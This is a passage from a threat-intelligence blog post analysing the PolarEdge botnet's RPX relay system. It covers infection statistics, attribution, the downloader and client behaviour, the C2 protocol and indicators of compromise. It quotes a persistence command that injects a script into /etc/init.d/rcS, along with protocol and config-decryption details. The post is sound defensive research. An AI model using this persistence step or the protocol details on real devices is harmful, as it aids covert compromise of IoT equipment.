<p>Through technical means, we obtained partial RPX_Client datasets. The data includes fields such as <strong>IP, brand, createAt, and onlineTime</strong>, enabling in-depth analysis of PolarEdge RPX across multiple dimensions: infection scale, geographic distribution, and device types.</p>
<pre><code class="language-json"># RPX Client Data Example
{
  &quot;id&quot;: 4,
  &quot;uuid&quot;: &quot;6cee47cf79f94dc4bf2b867028fc{mask}&quot;,
  &quot;ip&quot;: &quot;12x.18x.18x.23x&quot;,
  &quot;onlineTime&quot;: &quot;2025-10-16T14:34:27+08:00&quot;,
  &quot;antiConnTotal&quot;: &quot;0&quot;,
  &quot;antiConnNum&quot;: &quot;0&quot;,
  &quot;antiConnState&quot;: &quot;1&quot;,
  &quot;antiConnTime&quot;: &quot;0001-01-01T00:00:00Z&quot;,
  &quot;brand&quot;: &quot;ktcctv_1&quot;,
  &quot;version&quot;: &quot;0.0.13&quot;,
  &quot;heartbeat_time&quot;: &quot;60&quot;,
  &quot;no_response_num&quot;: &quot;1&quot;,
  ...
  &quot;createdAt&quot;: &quot;2025-10-16T14:34:13+08:00&quot;,
  &quot;updatedAt&quot;: &quot;2025-10-20T13:08:04+08:00&quot;,
  &quot;createBy&quot;: 0,
  &quot;updateBy&quot;: 0
}
</code></pre>
<p>Statistics show that since July 2024, over 25,000 IPs have been cumulatively infected, with the infection scale showing a sustained upward trend.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_clients.png" alt="polar_clients.png" loading="lazy"></p>
<p>Infected devices are distributed across 40 countries and regions, primarily concentrated in Southeast Asia and North America.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_example2.png" alt="polar_example2.png" loading="lazy"></p>
<p><strong>The top 10 countries</strong> are: South Korea 41.97%, China 20.35%, Thailand 8.37%, Malaysia 5.98%, India 3.79%, Israel 3.73%, USA 3.69%, Vietnam 2.56%, Indonesia 2.12%, Russia 1.19%.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_victims.png" alt="polar_victims.png" loading="lazy"></p>
<p>RPX_Client uses the brand field when reporting to the server to identify device grouping or type. The primary infected devices are ktcctv and tvt, accounting for over 90%.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_groups.png" alt="polar_groups.png" loading="lazy"></p>
<p>Below is the mapping of group strings to real device types.</p>
<table>
<thead>
<tr>
<th>Group</th>
<th>Device</th>
</tr>
</thead>
<tbody>
<tr>
<td>ktcctv</td>
<td>KT CCTV</td>
</tr>
<tr>
<td>tvt</td>
<td>Shenzhen TVT DVR</td>
</tr>
<tr>
<td>cyberoam</td>
<td>Cyberoam UTM</td>
</tr>
<tr>
<td>fh</td>
<td>unknow</td>
</tr>
<tr>
<td>asus</td>
<td>Asus Router</td>
</tr>
<tr>
<td>draytek</td>
<td>DrayTek Router</td>
</tr>
<tr>
<td>rv340</td>
<td>Cisco RV340 VPN Router</td>
</tr>
<tr>
<td>dlink</td>
<td>D-Link Router</td>
</tr>
<tr>
<td>univ</td>
<td>Uniview Webcam</td>
</tr>
</tbody>
</table>
<h1 id="2-timeline-attribution">2: Timeline &amp; Attribution</h1>
<hr>
<h2 id="capture-timeline-of-new-scripts">Capture Timeline of New Scripts</h2>
<ul>
<li><strong>April 27, 2025</strong>: Attackers exploited <strong>CVE-2023-20118</strong> via 111.119.223.196 to spread a script named <code>s</code>. Due to network issues, the script was not captured.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_cvepayload.png" alt="polar_cvepayload.png" loading="lazy"></p>
<ul>
<li><strong>May 30, 2025</strong>: IP 111.119.223.196 distributed an ELF file <code>w</code> at <code>111.119.223.196:51715/w</code>. This file was first seen on December 25, 2023, spread by <strong>82.118.22.155</strong>. Analysis of 82&#x2019;s activity revealed a clear chain: <strong>script <code>a</code> &#x2192; <code>w</code> &#x2192; script <code>q</code></strong>.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_qdownload.png" alt="polar_qdownload.png" loading="lazy"></p>
<p>Inspired by this, we proactively monitored <code>111.119.223.196:51715/q</code> in Xlab&#x2019;s Payload system.</p>
<ul>
<li><strong>June 2, 2025</strong>: Successfully captured <strong>script <code>q</code></strong>, which delivered the core subject of this research &#x2014; <strong>rpx_client</strong>. Notably, IP 111 provided intermittent downloads; <code>q</code> was not persistently available.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_hashpayload.png" alt="polar_hashpayload.png" loading="lazy"></p>
<h2 id="attribution-to-polaredge">Attribution to PolarEdge</h2>
<ul>
<li><strong>Role of 82.118.22.155</strong></li>
</ul>
<p>VirusTotal shows <strong>82.118.22.155</strong> spread shell script <code>a</code> and ELF <code>w</code> in December 2023, marking it as a likely downloader server. PDNS records reveal domain <strong>beastdositadvtofm[.]site</strong> resolved to this IP during the same period. Its CNAME chained to <strong>jurgencindy.asuscomm.com</strong> &#x2014; the same host pointed to by Sekoia-disclosed C2s <strong>icecreand[.]cc</strong> and <strong>centrequ[.]cc</strong>. These strong links confidently tie the domain and IP to PolarEdge infrastructure.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_cname.png" alt="polar_cname.png" loading="lazy"></p>
<p>Recently, while cataloging PolarEdge samples, we found <strong>conclusive evidence</strong>: both the domain and IP appear in the decrypted C2 config of PolarEdge backdoor sample 3e5e99b77012206d4d4469e84c767e6b. Thus, 82.118.22.155 was PolarEdge infrastructure in December 2023; samples <code>a</code> and <code>w</code> were likely used to fetch PolarEdge payloads. Both of them were developed by the PolarEdge group and exhibit attribution-worthy traits.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_c2config.png" alt="polar_c2config.png" loading="lazy"></p>
<ul>
<li><strong>ELF Sample Similarity</strong></li>
</ul>
<p>The new <code>w</code> includes two unencrypted sections: <strong>xxxx</strong> and <strong>cccc</strong>. Known PolarEdge samples use encrypted sections <strong>init_text</strong> and <strong>init_rodata</strong>. Despite encryption differences, the addition of custom sections reflects consistent design philosophy.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_sections.png" alt="polar_sections.png" loading="lazy"></p>
<p>Crucially, <code>w</code>&#x2019;s parameter strings and HTTP fields (e.g., Host, User-Agent) are highly distinctive and share clear homology with PolarEdge backdoors. We assess <code>w</code> as a <strong>stripped connect-back module</strong> from the PolarEdge core, dedicated to payload retrieval. This is reinforced by its sole supported mode <strong>&quot;curk&quot;</strong> &#x2014; likely a misspelling (or playful nod) to <code>curl</code>, underscoring its role as a <strong>downloader</strong>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_strings.png" alt="polar_strings.png" loading="lazy"></p>
<ul>
<li><strong>Script Similarity</strong></li>
</ul>
<p>Both <strong>111.119.223.196</strong> and <strong>82.118.22.155</strong> spread <code>w</code>, and their propagation scripts are nearly identical in style and structure.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_scripts.png" alt="polar_scripts.png" loading="lazy"></p>
<p>So we confirm that IP 111.119.223.196 is <strong>PolarEdge infrastructure</strong>. The <strong>RPX_Client</strong> sample, spread via scripts <code>q</code> and <code>w</code> in this campaign, is attributed to PolarEdge and represents the first identified relay component of this threat.</p>
<h1 id="3-technical-analysis">3: Technical Analysis</h1>
<hr>
<h2 id="functionality-of-script-q">Functionality of Script q</h2>
<p>We captured a total of 11 script <code>q</code> variants with distinct hashes. Despite the use of obfuscation, analysis was straightforward. All variants share nearly identical functionality: their purpose is to <strong>download and execute the RPX component</strong>, differing only in the C2 address.</p>
<ul>
<li><strong>Download wget.tar</strong></li>
</ul>
<p>Uses w to download wget.tar. Note the parameters of w: m indicates mode, h is the remote host, e is the port, f is the local path, and q is the remote path.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_wgettar.png" alt="polar_wgettar.png" loading="lazy"></p>
<p>The wget.tar archive contains two files: rpx and rpx.sh. Among them, rpx is the core analysis subject of this article, i.e., rpx_client; while rpx.sh is a persistence script. By executing the command <code>echo &quot;/bin/sh /mnt/mtd/rpx.sh &amp;&quot; &gt;&gt; /etc/init.d/rcS</code>, it injects rpx.sh into the rcS initialization script, thereby achieving persistent residency.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_archive.png" alt="polar_archive.png" loading="lazy"></p>
<ul>
<li><strong>Launch RPX Core Component</strong></li>
</ul>
<p>rpx adds the compromised device to the ORB network. Its first parameter is the control node IP, the second is the port, and the third is brand, likely indicating grouping. Across the 11 q scripts, we collected 10 unique control node IPs, all using port 55555.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_launchrpx.png" alt="polar_launchrpx.png" loading="lazy"></p>
<h2 id="rpx-system-deep-dive">RPX System Deep Dive</h2>
<ul>
<li><strong>RPX Server Node</strong></li>
</ul>
<p>RPX server nodes typically run four core services: RPX_Server, Nginx, Go-Admin, and Go-Shadowsocks. Among them, RPX_Server and the customized Go-Admin are key PolarEdge components &#x2014; RPX_Server acts as the worker node, handling actual proxy services; Go-Admin serves as the administrator node, managing node registration, session validation, command distribution, and Clash configuration export for third-party use. Nginx operates in reverse proxy mode, forwarding traffic from port 19999 to the Go-Admin service, while Go-Shadowsocks is dedicated to providing Shadowsocks proxy service.</p>
<p>These services produce distinct network fingerprints:</p>
<table>
<thead>
<tr>
<th>Service</th>
<th>Port(s)</th>
<th>Certificate Fingerprint / Trait</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Nginx</strong></td>
<td>19999</td>
<td>Fixed self-signed cert: <code>3f00058448b8f7e9a296d0cdf6567ceb23895345eae39d472350a27b24efe999</code></td>
</tr>
<tr>
<td><strong>RPX_Server</strong></td>
<td>55555, 55557, 55558</td>
<td>Fixed self-signed cert: <code>e234e102cd8de90e258906d253157aeb7699a3c6df0c4e79e05d01801999dcb5</code></td>
</tr>
<tr>
<td><strong>Go-Admin</strong></td>
<td>55560</td>
<td>Dynamic self-signed cert with <strong>O = null, CN = null</strong>, serial <code>123456</code></td>
</tr>
</tbody>
</table>
<hr>
<ul>
<li><strong>RPX Server</strong></li>
</ul>
<p>In brief, RPX Server is a <strong>reverse-connection proxy gateway</strong>. Its core mechanism: it does not connect directly to the target, but instead schedules a registered proxy node to connect to the target, which then establishes a reverse connection back to a <strong>dynamically allocated temporary port</strong> on the gateway. Traffic between the client and target is transparently bridged on this port.</p>
<p>This is demonstrated in a live test: we ran RPX_Client on a Japan test host <code>45.x.x.8</code> and registered it with RPX Server node <code>8.216.14.9</code>. Then, from a local machine, we connected a go-shadowsocks client to this control node and queried the exit IP via <code>ipinfo.io</code>.</p>
<p>Although go-shadowsocks logs show the path as<br>
<code>Local proxy &#x2190;&#x2192; RPX Server &#x2190;&#x2192; ipinfo.io</code>,<br>
the actual IP returned by <code>curl --socks5</code> reveals the true full path:<br>
<strong>Local proxy &#x2190;&#x2192; RPX Server &#x2190;&#x2192; RPX Client (45.x.x.8) &#x2190;&#x2192; ipinfo.io</strong>. In real-world attacks, this <strong>multi-hop</strong> design effectively conceals the attack source.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_proxyexample.jpg" alt="polar_proxyexample.jpg" loading="lazy"></p>
<p>The server accepts two runtime parameters: the first is the port for interacting with RPX_Client, and the second is the base port for proxy services, which enables three protocols &#x2014; SOCKS5 on the base port, SOCKS5 over TLS on base+1, and Trojan on base+2. Observed values are 55555 and 55556, respectively. Implementation details of RPX Server have been thoroughly covered in Censys reports; this article does not repeat them, and interested readers are encouraged to consult those publications.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_servermain.png" alt="polar_servermain.png" loading="lazy"></p>
<ul>
<li><strong>RPX Client</strong></li>
</ul>
<p>We captured a total of 4 RPX_Client samples: three from IP 111.119.223.196 (all ARM architecture) and one from VirusTotal (MIPS architecture), indicating additional distribution channels in the wild. All four samples are version 0.0.13, which, according to current statistics, is the dominant version in active use.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_version.png" alt="polar_version.png" loading="lazy"></p>
<p>Among the 4 samples, <code>7fa5fb15098efdf76e4c016e2e17bb38</code> stands out because it prints <strong>debug information</strong> to the console at runtime. We selected it as the primary analysis target. Its basic details are as follows:</p>
<pre><code>MD5: 7fa5fb15098efdf76e4c016e2e17bb38
MAGIC: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped
PACKER: None
</code></pre>
<p>RPX_Client acts as a <strong>jumpserver</strong> in the ORB &#x2014; confirmed by leaked source paths and runtime logs.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_logs.png" alt="polar_logs.png" loading="lazy"></p>
<p>Its functional design is relatively straightforward. After compromising the target device, the program first disguises its process name as <code>connect_server</code> and uses the PID file <code>/tmp/.msc</code> to enforce single-instance execution, preventing duplicate startups. It then attempts to read the global configuration file <code>.fccq</code> to obtain key parameters such as the C2 server address, communication port, device UUID, and brand information. If the configuration file does not exist, it encrypts the runtime-passed parameters and saves them to <code>.fccq</code> for subsequent use.</p>
<p>After completing configuration initialization, RPX_Client establishes two independent network connections to the C2 server for different tasks:</p>
<ul>
<li>One connects to the port specified by the PORT parameter (listened by RPX_Server) for <strong>node registration</strong> and <strong>traffic proxying</strong></li>
<li>The other connects to the fixed port <strong>55560</strong> (listened by go-admin) for <strong>remote command execution</strong></li>
</ul>
<hr>
<h4 id="decrypting-fccq-config">Decrypting <code>.fccq</code> Config</h4>
<p>On first run, RPX_Client encrypts the parameters and saves them to the .fccq file in the same directory using single-byte XOR with 0x25. A real-world example of the generated config, when decrypted, contains the fields UUID, C2, PORT, BRAND, version.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_fccq.png" alt="polar_fccq.png" loading="lazy"></p>
<hr>
<h4 id="port-55555-registration-proxy">Port 55555: Registration &amp; Proxy</h4>
<p>When RPX_Client first joins the network, it must obtain a <strong>server-generated UUID</strong> as its identity. The network interaction flow is as follows:</p>
<ol>
<li><strong>Bot &#x2192; C2</strong>: 33 bytes &#x2192; <code>flag(1 byte) + uuid(32 bytes)</code></li>
<li><strong>Bot &#x2192; C2</strong>: 32 bytes &#x2192; <code>brand(16 bytes) + version(16 bytes)</code></li>
<li><strong>C2 &#x2192; Bot</strong>: 33 bytes &#x2192; <code>flag(1 byte) + uuid(32 bytes)</code></li>
</ol>
<p>When the <code>flag</code> in the C2 response is <strong><code>0x01</code></strong>, it indicates UUID acceptance; the bot saves this UUID to the config file for future use.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_port55555.png" alt="polar_port55555.png" loading="lazy"></p>
<p>It then awaits further C2 commands to provide proxy services. The command structure is:</p>
<pre><code class="language-c">struct Protocol
{
  uint16_t magic;
  uint16_t port;
  uint16_t dst_port;
  uint16_t dest_length;
  char     destination[256];
};
</code></pre>
<p>The <code>magic</code> field defines the bot&#x2019;s function, with possible values: <strong><code>0x11</code>, <code>0x12</code>, <code>0x16</code></strong>.</p>
<p>Our Xlab command tracking system emulates this protocol. Statistics show <strong>no specific targeting</strong> &#x2014; traffic is mostly to <strong>QQ, WeChat, Google, and Cloudflare</strong>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_tracking.png" alt="polar_tracking.png" loading="lazy"></p>
<hr>
<h4 id="port-55560-remote-command-execution"><strong>Port 55560: Remote Command Execution</strong></h4>
<p>RPX_Client connects to the server&#x2019;s port 55560, sends its UUID to authenticate, and receives remote commands. The interaction flow is:</p>
<ol>
<li><strong>Bot &#x2192; C2</strong>: 11 bytes, fixed string <code>&quot;xa2axasexqx&quot;</code></li>
<li><strong>Bot &#x2192; C2</strong>: 32 bytes, <strong>UUID</strong></li>
<li><strong>C2 &#x2192; Bot</strong>: 4 bytes, command payload length</li>
<li><strong>C2 &#x2192; Bot</strong>: command payload, specified by the <code>&quot;cmd&quot;</code> field</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_port55560.png" alt="polar_port55560.png" loading="lazy"></p>
<p>Beyond standard system commands, the sample includes two special built-in commands:</p>
<ul>
<li><strong><code>change_pub_ip</code></strong> &#x2013; updates the C2 server address</li>
<li><strong><code>update_vps</code></strong> &#x2013; performs sample self-upgrade</li>
</ul>
<p>Leveraging <strong>UUID-based authentication</strong> and <strong>remote command execution</strong>, PolarEdge operators achieve <strong>fine-grained control and flexible scheduling</strong> of proxy nodes &#x2014; enabling on-demand task reassignment, role switching, or rapid migration of the entire proxy pool to a new C2 when one is exposed.</p>
<p>While our command tracking system currently only captures simple heartbeat commands like <code>echo hello</code>, <strong>server logs clearly show real executions of <code>change_pub_ip</code></strong>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_changeip.png" alt="polar_changeip.png" loading="lazy"></p>
<p>Additionally, logs contain commands tied to 111.119.223.196, confirming it not only served as a download server but also as a <strong>reverse shell c2</strong> &#x2014; providing definitive proof that this IP is PolarEdge infrastructure and validating our initial assessment at the start of this report.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_datalog.png" alt="polar_datalog.png" loading="lazy"></p>
<h1 id="summary">Summary</h1>
<p>Our analysis of the RPX system concludes here with the key findings to date. RPX_Client offers a glimpse into PolarEdge&#x2019;s relay mechanism, while RPX_Server and Go-Admin reveal&#x2014;for the first time&#x2014;the management tools and infrastructure behind this threat. In this architecture, a vast pool of compromised IoT devices serves as proxy nodes, complemented by server nodes built on inexpensive VPS, forming two robust barriers that provide attackers with effective cover and greatly increase the difficulty of tracking by security personnel.</p>
<p>Due to limited visibility, the specific connections and interactions between PolarEdge backdoor samples and the RPX system remain an open question. We sincerely welcome industry peers with additional information to share their insights and jointly advance the understanding and defense against such threats.</p>
<p>If you are interested in our research or have clues related to PolarEdge, please feel free to contact us via the <a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X platform</a>.</p>
<h1 id="ioc">IOC</h1>
<h4 id="polaredge-rpx-c2">PolarEdge RPX C2</h4>
<pre><code># From q script

47[.79.7.193	United States|Virginia|Ashburn	AS45102|Alibaba Cloud
47[.236.38.206	United States|None|None	AS45102|Alibaba Cloud
47[.236.230.216	United States|None|None	AS45102|Alibaba Cloud
47[.237.26.232	United States|None|None	AS45102|Alibaba Cloud
47[.237.70.132	United States|None|None	AS45102|Alibaba Cloud
47[.76.214.52	China|Hongkong|Hongkong	AS45102|Alibaba Cloud
43[.128.226.160	Japan|Tokyo|Tokyo	AS132203|Tencent
129[.226.216.242	Singapore|Singapore|Singapore	AS132203|Tencent
8[.211.172.183	Japan|Tokyo|Tokyo	AS45102|Alibaba Cloud
159[.138.90.5	Singapore|Singapore|Singapore	AS136907|HUAWEI

# From Hunter

8[.219.214.27	AS45102 Alibaba (US) Technology Co., Ltd.
8[.153.163.19	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.153.205.139	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.153.207.128	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.129.39	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.130.12	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.135.220	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.136.155	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.159.139.71	AS37963 Hangzhou Alibaba Advertising Co.,Ltd.
8[.216.14.9	AS45102 Alibaba (US) Technology Co., Ltd.

</code></pre>
<h4 id="polaredge-backdoor-c2">PolarEdge Backdoor C2</h4>
<pre><code>beastdositadvtofm[.site
missionim[.cc
icecreand[.cc 
centrequ[.cc

</code></pre>
<h4 id="downloader">Downloader</h4>
<pre><code>82[.118.22.155	Poland|Pomorskie|Gdansk	AS204957|GREEN FLOID LLC
111[.119.223.196	Singapore|Singapore|Singapore	AS136907 HUAWEI CLOUDS|
</code></pre>
<h4 id="rpx-sample">RPX Sample</h4>
<pre><code># Script q
96b3be4cf3ad232ca456f343f468da0e

# RPX Server
1fb2dfb09a31f0e8c63cc83283532f06

# RPX Client
7fa5fb15098efdf76e4c016e2e17bb38
571088182ed7e33d986b3aa2c51efd27

</code></pre>
<h4 id="certificates">Certificates</h4>
<pre><code># 3f00058448b8f7e9a296d0cdf6567ceb23895345eae39d472350a27b24efe999

-----BEGIN CERTIFICATE-----
MIIFmTCCBIGgAwIBAgIQA/0Ssnj2KNvPpAAwE8RHPTANBgkqhkiG9w0BAQsFADBu
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMS0wKwYDVQQDEyRFbmNyeXB0aW9uIEV2ZXJ5d2hlcmUg
RFYgVExTIENBIC0gRzEwHhcNMTgxMTI3MDAwMDAwWhcNMTkxMTI3MTIwMDAwWjAd
MRswGQYDVQQDExJ3d3cubGVhcm5pbmdydGMuY24wggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCAQKsFEj2H8QTVCEtAEjGp5kUAWHihsCbuMYhHdAxSKYfF
HldJGaRUpuQwxAte1k8b++C9rxKZRJJt05O85deMvdwF63yBG5DazGXKkwMluRrA
/KsZy3lPj3uinSO8sLFfoTcsk57wAXbZtVFgvmgxAXFlX7Vx9MNgYMdko+jAltCa
3CkmScqcPd/aOnjx4naz7k3Jl1AHY7jxIaRGLBd+aixOZw2CJdHjpYi++GRtVBIo
w5ki3WVm1lensHo3GWVjUP5rIbsttpbpja2V0Uy5es1Gcrmkp9e4BUTyopJkGqrA
F2uWZxZB8CcJkFceOUfCY3v5MWH311BwBaZ+GngBAgMBAAGjggKCMIICfjAfBgNV
HSMEGDAWgBRVdE+yck/1YLpQ0dfmUVyaAYca1zAdBgNVHQ4EFgQUGCuoNOqYS8DF
1dd4XIP/YilDUJEwLQYDVR0RBCYwJIISd3d3LmxlYXJuaW5ncnRjLmNugg5sZWFy
bmluZ3J0Yy5jbjAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEG
CCsGAQUFBwMCMEwGA1UdIARFMEMwNwYJYIZIAYb9bAECMCowKAYIKwYBBQUHAgEW
HGh0dHBzOi8vd3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQIBMH0GCCsGAQUF
BwEBBHEwbzAhBggrBgEFBQcwAYYVaHR0cDovL29jc3AuZGNvY3NwLmNuMEoGCCsG
AQUFBzAChj5odHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRW5jcnlwdGlvbkV2
ZXJ5d2hlcmVEVlRMU0NBLUcxLmNydDAJBgNVHRMEAjAAMIIBBAYKKwYBBAHWeQIE
AgSB9QSB8gDwAHUAu9nfvB+KcbWTlCOXqpJ7RzhXlQqrUugakJZkNo4e0YUAAAFn
VArhKwAABAMARjBEAiBYzdYfv9uZCl7ItYugZ8rKwBdkl64L3Bo4hMyM2oLPdAIg
OOy3aJnqp31jGrtIG5u6hPfAWNkiBPfGQCEDeBsRhaYAdwCHdb/nWXz4jEOZX73z
bv9WjUdWNv9KtWDBtOr/XqCDDwAAAWdUCuH+AAAEAwBIMEYCIQD4eai+g9Dx4ZhW
h8+VDwRjrspTNycWeg0ehjf+p5NwBAIhAPQpUvUrdJp/KqLKz4TNnyJtU0ezPZdY
XGQVeYtwkDOQMA0GCSqGSIb3DQEBCwUAA4IBAQAZwr2CFBCmPw4H16UpsbEK4Wie
ldbsrBhRMX2bH47Sr2CQvAJLm2MODVDi7XtF1ZR1XmLQOiKsHNVXveDq5UJomWIn
NDkXxYPNMQzVB6WLxO9HZsM302CIrE4ds9PUWWZ8wVtyv6o/nqczu+uuyX0Vs0/J
dclkw7r3TntrPwgTj/3dCSBchdT33vdTGjnyc9Hz7gN0aU8Ksnzf7Vxm53lmk4t1
aHKYUDQtPle5MKNgg88fjCsrfMZAfpcR3GKfCSa3I4f4vhvsg2ap4fJsXKjHtOLN
8qfw7B8Qm5/PpsRzYHB+WEPkfwIKxR9gIifQEbNnSSCCl3GJVqH4c1HJcb1z
-----END CERTIFICATE-----


# e234e102cd8de90e258906d253157aeb7699a3c6df0c4e79e05d01801999dcb5

-----BEGIN CERTIFICATE-----
MIICHzCCAaWgAwIBAgIBCTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G
A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN
MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjA0MQswCQYDVQQGEwJOTDERMA8G
A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG
CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA
2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd
BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB
PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh
clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG
CCqGSM49BAMCA2gAMGUCMQCaLFzXptui5WQN8LlO3ddh1hMxx6tzgLvT03MTVK2S
C12r0Lz3ri/moSEpNZWqPjkCMCE2f53GXcYLqyfyJR078c/xNSUU5+Xxl7VZ414V
fGa5kHvHARBPc8YAIVIqDvHH1Q==
-----END CERTIFICATE-----

</code></pre>
<h1 id="reference">Reference</h1>
<h4 id="sekioa">Sekioa</h4>
<p><a href="https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/?ref=blog.xlab.qianxin.com">https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/</a><br>
<a href="https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/?ref=blog.xlab.qianxin.com">https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/</a></p>
<h4 id="censys">Censys</h4>
<p><a href="https://censys.com/blog/2025-state-of-the-internet-digging-into-residential-proxy-infrastructure?ref=blog.xlab.qianxin.com">https://censys.com/blog/2025-state-of-the-internet-digging-into-residential-proxy-infrastructure</a></p>
<h4 id="mandiant">Mandiant</h4>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks?ref=blog.xlab.qianxin.com">https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks</a></p>
]]></content:encoded></item><item><title><![CDATA[锁定ORB网络PolarEdge的关键拼图: RPX中继系统浮出水面]]></title><description><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p>2025&#x5E74;5&#x6708;30&#x65E5;&#xFF0C;<code>Xlab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;</code>&#x76D1;&#x6D4B;&#x5230;IP&#x5730;&#x5740; 111.119.223.196 &#x6B63;&#x5728;&#x4F20;&#x64AD;&#x4E00;&#x4E2A;&#x540D;&#x4E3A;&#x201C;w&#x201D;&#x7684;ELF&#x6587;&#x4EF6;&#x3002;AI&#x68C0;&#x6D4B;&#x6A21;</p>]]></description><link>https://blog.xlab.qianxin.com/the-smoking-gun-exposing-the-rpx-relay-at-the-heart-of-polaredge/</link><guid isPermaLink="false">68c53551428efe0001a254c8</guid><category><![CDATA[ORB]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[Proxy]]></category><category><![CDATA[CN]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Wed, 29 Oct 2025 03:20:22 GMT</pubDate><content:encoded><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p>2025&#x5E74;5&#x6708;30&#x65E5;&#xFF0C;<code>Xlab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;</code>&#x76D1;&#x6D4B;&#x5230;IP&#x5730;&#x5740; 111.119.223.196 